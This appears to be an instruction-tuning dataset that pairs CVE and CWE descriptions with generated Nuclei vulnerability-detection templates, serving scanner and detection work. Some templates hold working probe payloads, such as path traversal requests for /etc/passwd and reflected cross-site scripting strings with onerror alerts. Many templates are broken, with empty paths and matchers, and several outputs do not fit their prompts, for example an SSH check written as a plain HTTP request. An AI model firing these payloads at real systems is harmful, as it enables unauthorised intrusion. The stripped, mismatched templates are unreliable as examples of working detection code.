200\n - type: word\n words:\n - \"Directive '@deprecated' may not be used on query.\" \n part: body", "category": "generic", "severity": "info", "id": "graphql-strawberry-detect"} {"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: lucee-xss\n\ninfo:\n name: Lucee - Cross-Site Scripting\n author: incogbyte\n severity: high\n description: Lucee contains a cross-site scripting vulnerability. It allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.\n tags: lucee,xss,unauth,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm\" \n - \"{{BaseURL}}/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"MissingIncludeException\" \n - \"lucee-err\" \n part: body\n condition: and", "category": "cwe", "severity": "high", "id": "CWE-79"} {"instruction": "Generate a Nuclei template for: SSH Weak Algorithms Supported", "input": "Title: SSH Weak Algorithms Supported\nSummary: SSH Weak Algorithms Supported. SSH weak algorithms are outdated cryptographic methods that pose security risks. Identifying and disabling these vulnerable algorithms is crucial for enhancing the overall security of SSH connections.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: ssh-weak-algo-supported\n\ninfo:\n name: SSH Weak Algorithms Supported\n author: pussycat0x\n severity: medium\n description: SSH weak algorithms are outdated cryptographic methods that pose security risks. Identifying and disabling these vulnerable algorithms is crucial for enhancing the overall security of SSH connections.\n tags: js,enum,ssh,misconfig,network,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "ssh-weak-algo-supported"} {"instruction": "Generate a Nuclei template for: Goliath Detection", "input": "Title: Goliath Detection\nSummary: Goliath Detection. Goliath is a non-blocking Ruby web server framework\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: goliath-detect\n\ninfo:\n name: Goliath Detection\n author: geeknik\n severity: info\n description: Goliath is a non-blocking Ruby web server framework\n tags: tech,goliath,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: header", "category": "generic", "severity": "info", "id": "goliath-detect"} {"instruction": "Generate a Nuclei template for CVE-2012-4253", "input": "Title: Path Traversal in mysqldumper mysqldumper\nSummary: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: mysqldumper mysqldumper\nIndicators: error, vulnerability detected", "output": "id: CVE-2012-4253\n\ninfo:\n name: MySQLDumper 1.24.4 - Directory Traversal\n author: daffainfo\n severity: medium\n description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.\n tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2012-4253"} {"instruction": "Generate a Nuclei template for CVE-2021-24452", "input": "Title: Cross-Site Scripting (XSS) in boldgrid w3_total_cache\nSummary: The W3 Total Cache WordPress plugin before 2.1.5 was affected by a reflected Cross-Site Scripting (XSS) issue within the \"extension\" parameter in the Extensions dashboard, when the 'Anonymously track usage to improve product quality' setting is enabled, as the parameter is output in a JavaScript context without proper escaping. This could allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: boldgrid w3_total_cache\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24452\n\ninfo:\n name: WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2021-24452"} {"instruction": "Generate a Nuclei template for CVE-2024-47062", "input": "Title: SQL Injection in navidrome navidrome\nSummary: Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: navidrome navidrome\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-47062\n\ninfo:\n name: Navidrome < 0.53.0 - Authenticated SQL Injection\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n tags: cve,cve2024,sqli,orm-leak,navidrome,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-47062"} {"instruction": "Generate a Nuclei template for CVE-2018-14728", "input": "Title: Vulnerability (CWE-918) in tecrail responsive_filemanager\nSummary: upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: critical\nAffected Products: tecrail responsive_filemanager\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-14728\n\ninfo:\n name: Responsive filemanager 9.13.1 Server-Side Request Forgery\n author: madrobot\n severity: critical\n description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.\n tags: cve2018,cve,ssrf,lfi,packetstorm,edb,intrusive,tecrail,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/filemanager/upload.php\" \n matchers:\n - type: regex\n part: body", "category": "cve", "severity": "critical", "id": "CVE-2018-14728"} {"instruction": "Generate a Nuclei template for CVE-2022-37122", "input": "Title: Path Traversal in carel pcoweb_card_firmware and others\nSummary: Carel pCOWeb HVAC BACnet Gateway 2.1.0, Firmware: A2.1.0 - B2.1.0, Application Software: 2.15.4A Software v16 13020200 suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: carel pcoweb_card_firmware, carel applica, carel pcoweb_hvac_bacnet_gateway\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-37122\n\ninfo:\n name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Path Traversal\n author: gy741\n severity: high\n description: Carel pCOWeb HVAC BACnet Gateway 2.1.0 contains an unauthenticated arbitrary file disclosure caused by improper verification of the 'file' GET parameter in logdownload.cgi, letting attackers disclose sensitive files via directory traversal, exploit requires no authentication.\n tags: cve,cve2022,carel,lfi,traversal,unauth,bacnet,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd\" \n matchers:\n - type: regex", "category": "cve", "severity": "high", "id": "CVE-2022-37122"} {"instruction": "Generate a Nuclei template for CVE-2022-24223", "input": "Title: SQL Injection in thedigitalcraft atomcms\nSummary: AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: thedigitalcraft atomcms\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-24223\n\ninfo:\n name: Atom CMS v2.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.\n tags: time-based-sqli,cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2022-24223"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: rumblechannel\n\ninfo:\n name: RumbleChannel User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: RumbleChannel user name information check was conducted.\n tags: osint,osint-political,rumblechannel,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://rumble.com/c/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"href=https://rumble.com/c/\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Nownodes API Test", "input": "Title: Nownodes API Test\nSummary: Nownodes API Test. Blockchain-as-a-service solution that provides high-quality connection via API\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-nownodes\n\ninfo:\n name: Nownodes API Test\n author: daffainfo\n severity: info\n description: Blockchain-as-a-service solution that provides high-quality connection via API\n tags: token-spray,nownodes\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"coin\":\" \n - \"\"host\":\" \n - \"\"version\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-nownodes"} {"instruction": "Generate a Nuclei template for CVE-2017-18562", "input": "Title: Cross-Site Scripting (XSS) in bestwebsoft error_log_viewer\nSummary: The error-log-viewer plugin before 1.0.6 for WordPress has multiple XSS issues.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: bestwebsoft error_log_viewer\nIndicators: error", "output": "id: CVE-2017-18562\n\ninfo:\n name: Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: The error-log-viewer plugin before 1.0.6 for WordPress has multiple XSS issues.\n tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2017-18562"} {"instruction": "Generate a Nuclei template for: Gitea 1.4.0 - Remote Code Execution", "input": "Title: Gitea 1.4.0 - Remote Code Execution\nSummary: Gitea 1.4.0 - Remote Code Execution. Gitea 1.4.0 is vulnerable to remote code execution.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: gitea-rce\n\ninfo:\n name: Gitea 1.4.0 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: Gitea 1.4.0 is vulnerable to remote code execution.\n tags: gitea,rce,unauth,edb,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body_3\n - type: word\n words:\n - \"application/octet-stream\" \n part: header_3", "category": "generic", "severity": "critical", "id": "gitea-rce"} {"instruction": "Generate a Nuclei template for: Gotify Login Panel - Detect", "input": "Title: Gotify Login Panel - Detect\nSummary: Gotify Login Panel - Detect. Gotify login panel was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: gotify-panel\n\ninfo:\n name: Gotify Login Panel - Detect\n author: righettod\n severity: info\n description: Gotify login panel was detected.\n tags: panel,gotify,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "gotify-panel"} {"instruction": "Generate a Nuclei template for CVE-2019-6793", "input": "Title: Vulnerability (CWE-918) in gitlab gitlab\nSummary: An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: high\nAffected Products: gitlab gitlab\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-6793\n\ninfo:\n name: GitLab Enterprise Edition - Server-Side Request Forgery\n author: ritikchaddha\n severity: high\n description: An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.\n tags: cve,cve2019,gitlab,enterprise,ssrf,blind,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"access_token=\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2019-6793"} {"instruction": "Generate a Nuclei template for: Pyramid Debug Toolbar", "input": "Title: Pyramid Debug Toolbar\nSummary: Pyramid Debug Toolbar. Pyramid Debug Toolbar provides a debug toolbar useful while you are developing your Pyramid application.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: pyramid-debug-toolbar\n\ninfo:\n name: Pyramid Debug Toolbar\n author: geeknik\n severity: medium\n description: Pyramid Debug Toolbar provides a debug toolbar useful while you are developing your Pyramid application.\n tags: pyramid,logs,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_debug_toolbar/\" \n matchers:\n - type: word\n words:\n - \"Pyramid Debug Toolbar\" \n - \"Pyramid DebugToolbar\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "pyramid-debug-toolbar"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: gamespot\n\ninfo:\n name: Gamespot User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Gamespot user name information check was conducted.\n tags: osint,osint-gaming,gamespot,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.gamespot.com/profile/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"'s Profile - GameSpot\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Improper Neutralization of Script-Related HTML Tags in a Web Page", "input": "Title: Improper Neutralization of Script-Related HTML Tags in a Web Page (CWE-80)\nSummary: The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \"<\", \">\", and \"&\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.\nVulnerability Type: Improper Neutralization of Script-Related HTML Tags in a Web Page\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: wp-all-export-xss\n\ninfo:\n name: WordPress All Export <1.3.6 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: WordPress All Export plugin before version 1.3.6 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.\n tags: wp-plugin,xss,wp,wordpress,authenticated,wpscan,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"manage&a\\\">\">\" \n - \"Manage Exports\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-80"} {"instruction": "Generate a Nuclei template for CVE-2023-41621", "input": "Title: Cross-Site Scripting (XSS) in emlog emlog\nSummary: A Cross Site Scripting (XSS) vulnerability was discovered in Emlog Pro v2.1.14 via the component /admin/store.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: emlog emlog\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-41621\n\ninfo:\n name: Emlog Pro v2.1.14 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: Cross Site Scripting (XSS) vulnerability in Emlog Pro v2.1.14 via /admin/store.php.\n tags: cve,cve2023,emlog,xss,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"onmouseover='alert(document.domain)'bad=\" \n - \"emlog\" \n part: response\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-41621"} {"instruction": "Generate a Nuclei template for CVE-2024-0986", "input": "Title: OS Command Injection in issabel pbx\nSummary: A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\nVulnerability Type: OS Command Injection\nSeverity: medium\nAffected Products: issabel pbx\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-0986\n\ninfo:\n name: Issabel Authenticated - Remote Code Execution\n author: eunji\n severity: medium\n description: A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE- The vendor was contacted early about this disclosure but did not respond in any way.\n tags: cve,cve2024,isssabel,authenticated,rce,asterisk,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body_3\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2024-0986"} {"instruction": "Generate a Nuclei template for CVE-2021-25104", "input": "Title: Cross-Site Scripting (XSS) in oceanwp ocean_extra\nSummary: The Ocean Extra WordPress plugin before 1.9.5 does not escape generated links which are then used when the OceanWP is active, leading to a Reflected Cross-Site Scripting issue\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: oceanwp ocean_extra\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-25104\n\ninfo:\n name: WordPress Ocean Extra <1.9.5 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.\n tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra,oceanwp,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"OceanWP\" \n - \">\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-25104"} {"instruction": "Generate a Nuclei template for CVE-2022-0201", "input": "Title: Cross-Site Scripting (XSS) in permalink_manager_lite_project permalink_manager_lite and others\nSummary: The Permalink Manager Lite WordPress plugin before 2.2.15 and Permalink Manager Pro WordPress plugin before 2.2.15 do not sanitise and escape query parameters before outputting them back in the debug page, leading to a Reflected Cross-Site Scripting issue\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: permalink_manager_lite_project permalink_manager_lite, permalink_manager_project permalink_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0201\n\ninfo:\n name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.\n tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"pm_query\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header", "category": "cve", "severity": "medium", "id": "CVE-2022-0201"} {"instruction": "Generate a Nuclei template for: Alibaba Cloud Environment Validation", "input": "Title: Alibaba Cloud Environment Validation\nSummary: Alibaba Cloud Environment Validation. Checks if Aliyun CLI is set up and all necessary tools are installed on the environment.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: alibaba-cloud-code-env\n\ninfo:\n name: Alibaba Cloud Environment Validation\n author: DhiyaneshDK\n severity: info\n description: Checks if Aliyun CLI is set up and all necessary tools are installed on the environment.\n tags: cloud,devops,aliyun,alibaba,alibaba-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "alibaba-cloud-code-env"} {"instruction": "Generate a Nuclei template for CVE-2024-6782", "input": "Title: Vulnerability (CWE-863) in CVE-2024-6782\nSummary: Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution.\nVulnerability Type: Vulnerability (CWE-863)\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-6782\n\ninfo:\n name: Calibre <= 7.14.0 Remote Code Execution\n author: DhiyaneshDK\n severity: critical\n description: Unauthenticated remote code execution via Calibre\u2019s content server in Calibre <= 7.14.0.\n tags: cve,cve2024,calibre,rce,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"application/json\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2024-6782"} {"instruction": "Generate a Nuclei template for CVE-2025-30567", "input": "Title: Path Traversal in CVE-2025-30567\nSummary: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in wp01ru WP01 allows Path Traversal. This issue affects WP01: from n/a through 2.6.2.\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-30567\n\ninfo:\n name: WordPress WP01 - Path Traversal\n author: s4e-io\n severity: high\n description: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in wp01ru WP01 allows Path Traversal. This issue affects WP01: from n/a through 2.6.2.\n tags: cve,cve2025,lfi,wp-plugin,wordpress,wp01,wp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2025-30567"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: prestashop-admin-panel\n\ninfo:\n name: Prestashop Admin Login Panel - Detect\n author: mastercho\n severity: info\n description: Prestashop admin login panel was detected.\n tags: prestashop,panel,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/{{paths}}/\" \n matchers:\n - type: word\n words:\n - \"PrestaShop\" \n - \"class=\"show-forgot-password\" \n part: body\n condition: and\n - type: word\n words:\n - \"themes/default/css/admin-theme.css\" \n - \"class=\"show-forgot-password\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: zentral-panel\n\ninfo:\n name: Zentral Panel - Detect\n author: Adam Crosser\n severity: info\n description: Zentral panel was detected.\n tags: panel,zentral,oss,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Zentral\" \n - \"